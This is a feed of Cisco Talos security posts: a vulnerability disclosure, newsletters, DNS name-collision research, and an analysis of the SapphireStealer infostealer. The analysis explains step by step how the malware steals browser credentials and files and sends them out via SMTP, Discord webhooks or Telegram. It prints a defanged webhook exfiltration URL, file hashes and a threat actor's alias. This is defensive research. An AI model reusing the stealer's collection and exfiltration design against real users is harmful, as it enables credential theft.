Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat is 62325.

ClamAV detections are available for this threat:

Win.Backdoor.M3MiniRAT-10007342-0

Win.Trojan.MaliciousInstaller-10007344-0

Win.Loader.PowerShellDecrypter-10007381-0

Win.Trojan.MaliciousInstaller-10007345-0

Win.Coinminer.PhoenixMiner-10007386-0

Win.Coinminer.lolMiner-10007385-0

Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries related to this threat, please follow the link here.

Indicators of Compromise

Indicators of Compromise associated with this threat can be found here.

Eight vulnerabilities in Open Automation Software Platform could lead to information disclosure, improper authentication

6 September 2023 at 16:46
Eight vulnerabilities in Open Automation Software Platform could lead to information disclosure, improper authentication

Cisco Talos recently disclosed eight vulnerabilities in the engine configuration functionality in Open Automation’s Software Platform.

OAS Platform is commonly found in industrial operations and enterprise environments. It allows various devices, including PLCs, servers, files, databases and internet-of-things platforms to communicate with one another and share data when they otherwise would be unable to because of their various protocols.

The vulnerabilities Talos disclosed on Sept. 5 all exist inside the OAS Platform’s Engine configuration management functionality. Through the configuration tool, users can load or save a set of configurations to a disk and install it on other devices.

TALOS-2023-1775 (CVE-2023-35124), TALOS-2023-1776 (CVE-2023-34353) and TALOS-2023-1774 (CVE-2023-32271) can all lead to the disclosure or decryption of sensitive information on the targeted device.

TALOS-2023-1769 (CVE-2023-31242) and TALOS-2023-1770 (CVE-2023-34998) could also allow an adversary to gain access to the OAS Platform system if they send a specially crafted set of network requests. TALOS-2023-1772 (CVE-2023-34317) can also be triggered if the adversary exploits one of the two previously mentioned to authenticate into the system. Lastly, TALOS-2023-1771 (CVE-2023-32615) fits into this attack chain after an adversary authenticates in, allowing them to overwrite or create a new file on behalf of the logged-in OAS user.

TALOS-2023-1773 (CVE-2023-34994) inherently exists in the software, because any user who is not authorized on the underlying system can create new directories anywhere that the underlying OAS user system account has access to, thus allowing the unauthorized user to create new, unwanted directories.

This means that an application user who is not authorized on the underlying system is capable of creating new directories anywhere that the underlying OAS user system account has access.

Talos worked with Open Automation to ensure these vulnerabilities are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

For Snort coverage (SIDs 61991 - 61994, 62003 and 62004) that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

New open-source infostealer, and reflections on 2023 so far

31 August 2023 at 18:00
New open-source infostealer, and reflections on 2023 so far

Welcome to this week’s edition of the Threat Source newsletter.

I’m covering for Jon this week whilst he takes some well-deserved holiday. What’s on my mind this week? Well, apart from a new horror film that I just read about called “Slotherhouse” where the killer is, um, a sloth (I predict nothing but a masterpiece), there are a couple of things on my mind relating to open-source.

Firstly, on the bad actor side of things, we’re seeing more and more bad guys take advantage of the availability of tools that have been added to public malware sites, such as the infostealer “SaphireStealer” which you can read about below.

When I spoke to Cisco Talos’ Head of Outreach, Nick Biasini, about the biggest trends 2023 so far, he called out how attackers are increasingly using malicious open-source tooling. This has been a large part of the reason we are seeing a continuous fracturing of the ransomware and extortion landscape, as threat actors find what they need online, and then adapt these tools to suit their needs, and in many cases add on anti-detection mechanisms.

Speaking of 2023 trends, I just uploaded a new playlist of 1–2-minute long videos featuring Nick’s thoughts and explanations on some of the biggest threats we’ve seen so far this year - including the evolution of ransomware, the rise in commercial spyware, and supply chain attacks. Check out the playlist. As a preview, here's Nick talking about the evolution of ransomware in 2023:

On the flip side, open-source is of course one of the most important ways in which security defenders can learn, upskill, and share their findings with the community. That’s one of the reasons why Talos creates and releases open-source software, for free.

Just in case you don’t know about our open-source tools, which have been developed by some of the smartest brains on the planet, you should check them out. We have around 27 tools which are available to download on our website at talosintelligence.com/software and on GitHub. The latest and greatest of these is the NIM-IDA-FLIRT Generator tool.

Oh, I just read that “Slotherhouse” will not only feature a killer sloth, it’s called Alpha, and their weapon of choice is a samurai sword. One ticket please.

The one big thing

SapphireStealer, an open-source information stealer, has been increasingly observed across public malware repositories since its initial release in December 2022. SapphireStealer is an example of a new type of information stealer, which is mostly designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information.

While infostealers have been around for a very long time, Talos has recently seen an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces.

Why do I care?

As is often the case following the release of a new open-source malware codebase, threat actors have acted quickly, and began to experiment. Some threat actors have even extended SaphireStealer to support added functionality, and used other tooling to make the detection of SapphireStealer infections more difficult (again, another increasing trend that we’re seeing across the threat landscape). Infostealers remain a popular choice for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information to adversaries.

So now what?

A comprehensive blog written by Edmund Brumaghin covers the background behind SapphireStealer, and our research on the tool, including a case study where we saw multiple failures on the part of the threat actor to maintain sound operational security. The blog includes Snort SIDs, and indicators of compromise.

Top security headlines of the week

  • Operation “Duck Hunt" proactively removes Qakbot malware from 700,000 infected machines. In one of the largest operations of its kind, federal law enforcement took decisive action against one of the most widely used and longstanding botnets. According to the U.S Department of Justice, these efforts resulted in Qakbot being “neutralized” from hundreds of thousands of devices. According to TechCrunch, “The Department of Justice also announced the seizure of more than $8.6 million in cryptocurrency from the Qakbot cybercriminal organization, which will now be made available to victims”. Dark Reading TechCrunch
  • What’s in a name? Strange behaviors at top-level domains creates uncertainty in DNS. When Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, it ignited a firestorm of controversy as security organizations warned against the confusion that was certain to occur. Talos researcher Jaeson Schultz recently wrote about the consequences of Google’s decsion, including how, in the worst case scenario, confusion over whether some name is a public DNS name, or another private resource can cause sensitive data to fall into the hands of unintended recipients. Talos blog.
  • OpenAI rolls out a business edition of ChatGPT, promising “enterprise-grade security”. OpenAI says it is making a commitment not to use client-specific prompts and data in the training of its models. SecurityWeek writes that “the security-centric features of the new ChatGPT Enterprise are meant to address ongoing business concerns about the protection of intellectual property and the integrity of sensitive corporate data when using LLM (large language model) algorithms.” SecurityWeek

Can’t get enough Talos?

Upcoming events where you can find Talos

LABScon (Sept. 20 - 23)

Scottsdale, Arizona

Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit.

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details

Typical Filename: VID001.exe

Claimed Product: N/A

Detection Name: Win.Worm.Coinminer::1201

SHA 256: 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6

MD5: 4c9a8e82a41a41323d941391767f63f7

VirusTotal: https://www.virustotal.com/gui/file/1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6/details

Typical Filename: !!Mreader.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Generic::sheath

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b

MD5: f5e908f1fac5f98ec63e3ec355ef6279

VirusTotal: https://www.virustotal.com/gui/file/7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b/details

Typical Filename: IMG001.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Coinminer::tpd

SapphireStealer: Open-source information stealer enables credential and data theft

31 August 2023 at 12:00
  • SapphireStealer, an open-source information stealer, has been observed across public malware repositories with increasing frequency since its initial public release in December 2022.
  • Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion.
  • We assess with moderate confidence that multiple entities are using SapphireStealer, who have improved and modified the original code base separately, extending it to support additional data exfiltration mechanisms leading to the creation of several variants.
  • In some cases, SapphireStealer appears to be delivered as part of a multi-stage infection process, with threat actors leveraging open-source malware downloaders like FUD-Loader to deliver SapphireStealer to potential victims.

SapphireStealer goes open-source, attackers take notice

SapphireStealer: Open-source information stealer enables credential and data theft

Information stealers have become increasingly popular across the threat landscape over the past several years. While these threats have been around for a very long time, Cisco Talos has recently observed an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces. Stealers are often seen as an attractive option for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information and account-related details to adversaries. These credentials often include corporate account credentials, access tokens and other data that can then be used to further compromise corporate networks. In many cases, the credential logs generated by information stealers are monetized and the network access they provide is sold to other threat actors who may use them to begin operating toward various post-compromise mission objectives, such as espionage or ransomware/extortion.

SapphireStealer is an example of a new information stealer, primarily designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information. SapphireStealer’s codebase was published on GitHub on Dec. 25, 2022.

SapphireStealer: Open-source information stealer enables credential and data theft

As is often the case following the release of a new open-source malware codebase, threat actors acted quickly, beginning to experiment with this stealer, extending it to support additional functionality, and using other tooling to make the detection of SapphireStealer infections more difficult.

Newly compiled versions of SapphireStealer began being uploaded to public malware repositories beginning in mid-January 2023, with consistent upload activity being observed through the first half of 2023. Compilation artifacts associated with these samples indicate that this malware codebase is currently being used by multiple threat actors. Multiple variants of this threat are already in the wild, and threat actors are improving on its efficiency and effectiveness over time.  

While most of the samples featured forged compilation timestamps, using the date on which the samples were initially uploaded to public repositories and compilation artifacts like PDB pathways allowed us to cluster malware activity and identify distinct development activity occurring.

SapphireStealer enables simple but effective credential and data theft

SapphireStealer is an information stealer that was written in .NET. It offers straightforward but effective functionality capable of stealing sensitive information from infected systems including:

  • Host information.
  • Screenshots.
  • Cached browser credentials.
  • Files stored on the system that match a predefined list of file extensions.

When the malware is initially executed, it first attempts to determine if any existing browser processes are running on the system. It queries the currently running process list for any process names that match the following list:

  • chrome
  • yandex
  • msedge
  • opera

If any matching processes are detected, the malware uses Process.Kill() to terminate them. This code execution for Google Chrome is shown below.

SapphireStealer: Open-source information stealer enables credential and data theft

Next, the malware calls Chromium.Get() to check for various browser database file directories under %APPDATA% or %LOCALAPPDATA%. The malware uses a hard-coded list of paths to identify the presence of credential databases for the following browser applications:

  • Chrome
  • Opera
  • Yandex
  • Brave Browser
  • Orbitum Browser
  • Atom Browser
  • Kometa Browser
  • Microsoft Edge
  • Torch Browser
  • Amigo
  • CocCoc
  • Comodo Dragon
  • Epic Privacy Browser
  • Elements Browser
  • CentBrowser
  • 360 Browser
SapphireStealer: Open-source information stealer enables credential and data theft

The malware creates a working directory at the following location to stage the data that will ultimately be exfiltrated:

%TEMP%\sapphire\work

The contents of any credential databases that are discovered are dumped. This information is then stored in a text file within the malware’s working directory called Passwords.txt.

SapphireStealer: Open-source information stealer enables credential and data theft

Next, the malware attempts to capture a screenshot from the system and stores it within the same working directory within a file called Screenshot.png.

SapphireStealer: Open-source information stealer enables credential and data theft

The malware creates a new subdirectory called `Files` within the malware’s working directory. A file grabber is then executed that attempts to locate any files stored within the victim’s Desktop folder that match a list of file extensions. The list varied across analyzed samples, but an example list is shown below:

  • .txt
  • .pdf
  • .doc
  • .docx
  • .xml
  • .img
  • .jpg
  • .png
SapphireStealer: Open-source information stealer enables credential and data theft

Once the file grabber has completed execution, the malware then creates a compressed archive called log.zip containing all of the logs that were previously written to the malware’s working directory.

SapphireStealer: Open-source information stealer enables credential and data theft

This data is then transmitted to the attacker via Simple Mail Transfer Protocol (SMTP) using credentials defined in the portion of code responsible for crafting and sending the message.

SapphireStealer: Open-source information stealer enables credential and data theft

The following host-related information is collected and included in the body of the email message:

  • IP address
  • Hostname
  • Screen resolution
  • OS version and CPU architecture
  • ProcessorId
  • GPU Information
SapphireStealer: Open-source information stealer enables credential and data theft

Once the logs have been successfully exfiltrated, the malware then deletes the working directory created earlier and terminates execution.

SapphireStealer: Open-source information stealer enables credential and data theft

SapphireStealer extended to support additional exfiltration methods

Since initial samples began being uploaded to public malware repositories and scanning platforms, we’ve observed several notable modifications made by various threat actors. Most of the development effort appears to have been focused on facilitating more flexible data exfiltration and alerting for attackers that achieve new SapphireStealer infections. As this malware is open-source and being used by multiple distinct threat actors, much of this development activity has occurred independently and new functionality is not present in sample clusters associated with other threat actors.

In one case, we observed a SapphireStealer sample where the data collected using the previously described process was exfiltrated using the Discord webhook API, a method we previously highlighted here.

SapphireStealer: Open-source information stealer enables credential and data theft

In this case, the Discord webhook URL (SendLog.url) was:

hxxps[:]//discord[.]com/api/webhooks/1123664977618817094/La_3GaXooH42oGRiy8o7sazh1Cg0V_mzkH67VryfSB1MCOlYee1_JPMCNsfOTji7J9jO

In several cases, we also observed SapphireStealer samples that featured the ability to alert attackers to newly acquired infections by transmitting the log data via the Telegram posting API.

In addition, we also observed variations in the file extensions being targeted for collection and exfiltration by the FileGrabber functionality present within SapphireStealer. While some were minimal, only containing a few file extensions, others contained a myriad of different file formats that the attacker could obtain.

Likewise, earlier versions of SapphireStealer featured redundant code execution, repeated superfluous executions of the same operations multiple times, and overall inefficiencies. During our analysis of other SapphireStealer samples over time, we observed repeated evidence that various threat actors had taken steps to streamline the malware’s operations, refactor the code significantly, and otherwise improve upon the core functionality of the stealer.

FUD-Loader used in multi-stage infections

In several cases, we observed threat actors attempting to leverage a malware downloader, called FUD-Loader which was also made available via the same GitHub account. This downloader was initially committed to GitHub on January 2, 2023, shortly after the initial code commit of SapphireStealer. Since its release, it’s been used by a variety of threats during the initial stages of the infection process to retrieve additional binary payloads from attacker-controlled distribution servers.

This loader, like SapphireStealer, was written in .NET and features fairly simplistic operations. It is essentially responsible for leveraging HTTP/HTTPS communications to retrieve additional executables from attacker-controlled infrastructure, saving the retrieved content to disk, and then executing it to continue the infection process.

SapphireStealer: Open-source information stealer enables credential and data theft

In most of the cases where this loader was used, it retrieved the SapphireStealer binary payloads being hosted on the infrastructure described in the next section, allowing us to attribute those samples to the same threat actor.

Throughout the course of 2023, we have also observed this downloader being used to deliver various other threats such as DcRat, njRAT, DarkComet, AgentTesla and more.

A case study in operational security (OPSEC) failure

In one cluster of malware activity we analyzed, we observed multiple failures on the part of the threat actor to maintain sound operational security. In one sample, we observed the presence of the following Program Database (PDB) pathway still present post-compilation:

C:\Users\roman\OneDrive\Рабочий стол\straler\net452\new_game.pdb

This sample was configured to use SMTP for data exfiltration and leveraged the following hardcoded credentials.

SapphireStealer: Open-source information stealer enables credential and data theft

These credentials were also hardcoded into another sample we analyzed.

We observed that this second sample featured a different PDB, which contained a specific typographical error in the PDB pathway.

D:\C# proect\Sapphire\obj\Debug\Sapphire.pdb

An earlier sample featured the same PDB pathway and the same typographical error. In this case, the threat actor hardcoded personally identifiable SMTP account information for data exfiltration.

SapphireStealer: Open-source information stealer enables credential and data theft

Looking for additional accounts that featured the handle/alias “romanmaslov200” led us to a variety of personal accounts that may be associated with the threat actor, such as an account for Steam, a popular video game storefront.

Two of these three samples were also observed being hosted at the following URL at various times:

SapphireStealer: Open-source information stealer enables credential and data theft

In addition to the aforementioned Steam account, we also identified a matching account on a Russian language freelance forum. This account was being used to advertise freelance web development services. The user profile also lists the domain observed hosting SapphireStealer samples and various dependency components retrieved for parsing credential databases and exfiltrating the data.

SapphireStealer: Open-source information stealer enables credential and data theft

One of the byproducts of readily available and open-source malware codebases is that the barrier to entry into financially motivated cybercrime has continued to decrease over time. This trend has become apparent when analyzing campaigns run by individuals or groups that demonstrate inexperience in establishing operational security throughout the various stages of the attack lifecycle. While it may take less operational expertise to conduct information stealer attacks, they can be extremely damaging to corporate environments as the data stolen is often leveraged for additional attacks at a later time.

Coverage

Ways our customers can detect and block this threat are listed below.

SapphireStealer: Open-source information stealer enables credential and data theft

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 62243-62247.

Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

Indicators of Compromise

IOCs for this research can also be found at our Github repository here

What's in a name? Strange behaviors at top-level domains creates uncertainty in DNS

29 August 2023 at 12:00
What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, igniting a firestorm of controversy as security organizations warned against the confusion that was certain to occur.

When clicking on a name that ends in “.zip” are people intending to open an archive file or an internet URL? The confusion that arises between the ZIP file extension and the ZIP TLD is called a “name collision” — and is not a new phenomenon.

According to ICANN, a name collision occurs “when a user unknowingly accesses a name that has been delegated in the public DNS when the user's intent is to access a resource identified by the same name in a private network.” Name collisions have been an issue dating back years. Back in 2013 when ICANN introduced several new TLDs they also introduced a Name Collision Occurrence Management Framework to deal with the problem.

Users and programs alike depend on DNS to navigate the internet. In the worst case, confusion over whether some name is a public DNS name or another private resource can cause sensitive data to fall into the hands of unintended recipients.

Controlled interruption

To alert network administrators to potential name collisions in DNS, the Name Collision Occurrence Management Framework prescribes a “controlled interruption.” In this approach, a TLD publishes special DNS records — instructions that provide information about a domain — at the root level. Some examples include mail exchange (MX), service location (SRV), text (TXT), and address (A) records. Networks whose internal names collide with the TLD receive DNS replies containing the name “your-dns-needs-immediate-attention.<TLD>” and IP address 127.0.53.53. Presumably, seeing this in the logs would allow administrators to address the problem.

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

The .kids TLD is not alright

One TLD that appears to publish controlled interruption DNS records is .kids. For example, querying DNS for the MX or SRV record for the .kids TLD yields the ‘your-dns-needs-immediate.attention.kids’ name in response. For some reason, however, contrary to the framework from ICANN, the .kids TLD publishes no A record at the root level. The .kids TLD formerly did have the 127.0.53.53 A record, per the controlled interruption policy from ICANN, but for whatever reason .kids stopped offering the A record IP address back in January of 2023. This suggests that after the controlled interruption policy was implemented it was either changed or never fully removed.

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS
Hostname lookups on various DNS record types in the .kids TLD.

One critical piece of information that was left out of the ICANN name collision framework was that the TLD must ensure the name, ‘your-dns-needs-immediate-attention.<TLD>’ is not available for public registration. Unfortunately, no such restriction was in place at the .kids TLD, and Cisco Talos successfully registered the domain name:

    your-dns-needs-immediate-attention.kids

Talos set up an internet server to log all activity related to this name, and immediately we received a barrage of HTTP requests from systems running Microsoft’s “System Center Configuration Manager.”

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS
SCCM requests are issued from various endpoints using a name in .kids.

System Center Configuration Manager is a tool used by administrators to remotely manage computer systems across a network. According to Microsoft:

“Configuration Manager helps you deliver more effective IT services by enabling:

  • Secure and scalable deployment of applications, software updates, and operating systems.
  • Real-time actions on managed devices.
  • Cloud-powered analytics and management for on-premises and internet-based devices.
  • Compliance settings management.
  • Comprehensive management of servers, desktops, and laptops.”

Because Talos registered the domain name "your-dns-needs-immediate-attention.kids", we were able to masquerade as a trusted system. Networks using .kids names could be tricked into trusting our system to relay internal mail, dictate configuration management settings, and more.

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS
Systems attempting to relay email through Talos to various email addresses @kids.

Cisco Talos reached out to the administrators of the .kids TLD informing them of the problem. The TXT, MX and SRV DNS records at the .kids TLD DNS server were subsequently removed.

Zombified DNS names

Name collisions aren’t the only situations that can cause a TLD to act strangely. Some do not respond properly when presented with names that have expired or never existed. In these TLDs, unregistered and expired domain names still resolve to IP addresses. Some of these TLDs even publish MX records and collect emails for the names in question.

Typically, when a domain name is not actively registered, a DNS query for that name will generate the response,‘NXDOMAIN’ which tells the user that a particular name does not exist. NXDOMAIN DNS responses are useful for a number of reasons. Email list managers, for example, might use NXDOMAIN responses from DNS to help prune invalid recipients and recipients that cannot receive mail from their mailing lists.

.ws ccTLD — Western Samoa

The .ws country-level TLD (ccTLD) was created for Western Samoa and marketed as a global TLD that could stand for “website.” When a domain name at the .ws TLD expires (or if it is a new name that was never registered), DNS servers will never return an `NXDOMAIN` response. Rather, the .ws TLD continues to hand out an IP address and MX server:

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

The mail.hope-mail.com server accepts mail for any unregistered domain name at the .ws ccTLD.

.vg ccTLD — The Virgin Islands

The .vg country-level TLD belongs to the British Virgin Islands and, like the .ws ccTLD, when a name at .vg expires (or if it is a new name that was never registered), DNS servers will respond with an IP address. However, unlike the .ws TLD, .vg doesn’t provide an MX server for the domain name.

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

On the surface, this would seem like a good thing that no MX record is provided. However, according to RFC 5321, when a domain name associated with an email address has no MX records, “the address is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host.” In other words, SMTP servers will assume that mail should be delivered to the IP address associated with the A record for a domain.

In fact, the IP address handed out by the .vg TLD does listen on port 25 and accepts connections for non-existent domain names. Fortunately, attempts to deliver mail to a non-existent domain will fail with a 550 error message:

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS
Unsuccessfully attempting to send mail to the implicit MX offered by .vg.

.ph ccTLD — The Philippines

The .ph ccTLD belongs to the Philippines, and instead of the expected NXDOMAIN response, DNS requests for expired or non-existent names at .ph will return the IP address 45[.]79[.]222[.]138.

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

Unlike the .vg ccTLD, there is no mail server listening on the IP address provided by the .ph TLD. Attempts to deliver mail to an expired .ph domain name will fail, but the domain name itself will still resolve, which can still be problematic in some situations.

Second-level “TLDs”

Besides the official list of TLDs sanctioned by ICANN, there are also quite a few second-level registrations that people have turned into their own “TLDs,” that also do not respond properly to zombified DNS names. For example, sites such as “com.de” are technically second-level registrations at the .de TLD, but they offer registrations at the third level, billing themselves as “Germany’s newest domain extension.”

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

Queries for expired/non-existent domains at com.de return both an IP address and a mail server.

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

Fortunately, the mail server mail.cash9.com will not accept mail for non-existent domain names.

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS
Unsuccessfully attempting to send mail to the MX offered by .com.de.

A similar situation exists at the “TLD” us.org, which markets itself as “a new domain extension for organizations, projects, websites and people with a higher standard of social responsibility and ethical behavior.”

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

When a DNS query is issued to us.org for a name that has expired or does not exist, an IP address is returned along with several MX servers:

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS
MX records for the .us.org domain.

The DNS records at us.org are set up in an interesting way. Although they return MX records for our non-existent domain name, if you look carefully at the MX records returned by the DNS we can see that the lowest preference MX is simply a dot [.]. This is a NULL MX setting and it means that there are no mail servers for the domain. Well-behaved mail servers will recognize the NULL MX preference and cease attempting to deliver mail to that address. Poorly behaved mail servers, on the other hand, may latch onto a lower preference MX and connect to googlemail.com to attempt email delivery.

Years into these games’ histories, attackers are still creating “Fortnite” and “Roblox”-related scams

24 August 2023 at 18:00
Years into these games’ histories, attackers are still creating “Fortnite” and “Roblox”-related scams

Welcome to this week’s edition of the Threat Source newsletter.

I have no idea how “Fortnite” keeps coming up in this newsletter, but here we are again.

Even though the game/metaverse has never been bigger, it had been a while since I had heard about “V-Bucks” scams. V-Bucks are the in-game virtual currency “Fortnite” uses to sell character skins and other visual elements.

After the game’s initial surge in popularity, scams claiming to get players easy V-Bucks were all over the place in the form of fake advertisements, phishing emails, scams and YouTube videos. And as the game has only become more ubiquitous, so have scams and cyber attacks centered around the game.

Wired reported last week that a central network of bad actors is responsible for compromising legitimate domains (some of them with the .gov and .edu top-level domains) and using them to trick players into sharing personal information or downloading malicious apps. This widespread campaign targets players of “Fortnite” and “Roblox,” another half-game, half-metaverse.

These compromised sites promised to send rewards in these games to players in exchange for clicking on a link, downloading a file or filling out a form.

This led me down another rabbit hole of potential Fortnite scams that I hadn’t thought about, which are the thousands of knockoffs that exist.

For some reason, just searching “Fortnite” on the Google Play store doesn’t return any results, but when you search “Fortnite game,” users are served with tons of apps of questionable origin and legitimacy. The real “Fortnite” can only be downloaded from the Epic Games Store, owned by the game’s publisher and the subject of a long legal saga with Apple.

The second-most-popular result for “Fortnite game” is something called “Battle Royale Chapter 4 Season3” published on the store by the auspiciously named “EPic Games,” which wreaks of the same vibes as a typosquatted domain.

Some of the top reviews for the app also seem to be written by bots, and in one case, the most recent 5-star review came from a user who appeared to credit ChatGPT with writing the text.

I’m not blaming anyone or any company for the existence of these types of scams, I just think it’s worth noting to parents and potential players that bad actors are still trying to backpack off the popularity of these games. It likely doesn’t fall on the companies making these games to regulate this space and make sure scammers aren’t capitalizing off their popularity — after all, no one blames the bank if an attacker uses their name in a phishing email to steal login credentials.

Years into these games’ histories, attackers are still creating “Fortnite” and “Roblox”-related scams

But I also don’t know who it falls to, either. As users, it again falls on us to just be hyper-vigilant and prepared, knowing attackers will try to leverage anything, even fake money used to buy virtual hot dog suits, to scam people.

The one big thing

The infamous Lazarus Group APT is back at it again with two new remote access trojans. The North Korean state-sponsored group is well known for using a variety of malware to generate revenue for the hermit government and trying to spy on their various adversaries. Now, they have two new RATs that Talos recently discovered, largely based on open-source tools or previously leaked malware code. Lazarus Group is increasingly using the Qt framework to create their malware, which poses new challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult.

Why do I care?

Any time the Lazarus Group is active, everyone should take notice. This is one of the most high-profile APTs on the threat landscape right now, and they’ve shown that they will not hesitate to exhaust all options to try to generate money for North Korea’s government. With this specific set of RATs, they are smaller than Lazarus’ usual payloads, which makes their operations slimmer, faster and harder to detect. Once infected, Lazarus Group can carry out a wide range of malicious actions on targets, ranging from deploying ransomware to completely lock down targeted machines, stealing personal information, or hijacking hardware for cryptocurrency mining.

So now what?

Both the blogs we published Thursday morning include guidance on remediating these threats. The use of open-source tooling can sometimes make it easier for security researchers to spot Lazarus Group activity, and in the case of the two new RATs, Talos has a wide range of Snort and ClamAV detection available.

Top security headlines of the week

The FBI warned that North Korean state-sponsored actors are preparing to cash out up to $40 million worth of cryptocurrency after multiple heists. The Lazarus Group reportedly is holding onto six separate crypto wallets holding a combined 1,580 Bitcoin over the course of 24 hours earlier this week. This APT is known for carrying out data breaches and cyber attacks to generate funding for the country’s illegal nuclear weapons program. The Lazarus Group previously stole $60 million and $37 million in cryptocurrency from Alphapo and CoinsPaid, respectively, in July, and $100 million from Atomic Wallet in June. In its alert, the FBI shared the Bitcoin addresses associated with the attacks so cryptocurrency agencies could examine their blockchain data and “be vigilant in guarding against transactions directly with, or derived from the addresses.” (TechCrunch, SecurityWeek)

A previously unknown hacking group appears to be behind a supply chain attack targeting roughly 100 computers located in Hong Kong and other areas of Asia. Security researchers attributed the attack to a new actor known as “Carderbee” that is currently not tied to any state affiliations. The attackers exploited the legitimate Cobra DocGuard software — made by a Chinese software company — to deliver a malicious software update that compromised the machines. Because only about 2,000 machines worldwide use DocGuard, researchers believe it is a highly targeted attack looking to compromise specific victims. Each attack tried to deploy the Korplug (the predecessor of PlugX) backdoor onto victim computers. (CyberScoop, The Record by Recorded Future)

